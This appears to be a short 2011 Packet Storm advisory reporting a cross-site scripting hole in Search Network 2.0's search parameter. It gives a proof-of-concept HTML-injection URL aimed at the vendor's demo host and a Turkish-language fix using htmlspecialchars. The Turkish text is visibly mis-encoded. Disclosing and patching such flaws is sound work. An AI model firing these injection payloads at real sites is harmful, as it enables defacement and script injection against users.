Search Network version 2.0 suffers from a cross site scripting vulnerability.
d9bf46ed6a1fecbfe80387c0f55029774dcda72b7f9db79795d19a7ce123b926##############################################################
[#] Script Name : Search Network 2.0
[#] Vulnerable Type : XSS Vulnerability
[#] Author : darkTR
[#] Date : 03.08.2011
[#] E-mail : darkTR@hotmail.com
[#] Target: : search.php?action=search_results&query=[XSS]
[#] Demo: : https://developer.searchnetworkhq.com/demo/search.php?
#############################################################
Exploits :
HTML ÝNJECTION
https://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=“><marquee>darkTR<%2Fmarquee>
XSS
https://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]
Açýðýn Kapatýlmasý ;
Htmlspecialchars kullanarak açýðý kapatabiliriz. Ýndex.php dosyasýný açarak ;
$result = file_get_contents($url);, (Helvetica, sans-serif">Bu kýsmý aþaðýdaki þekilde düzeltmeliyiz.)
$result = htmlspecialchars(file_get_contents($url));
Düzeltme iþleminden sonra ">,<" gibi karakterler html’ye dönüþecektir ve zaafiyet ortadan kalkacaktýr.
darkTR | Code Hunters TIM
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed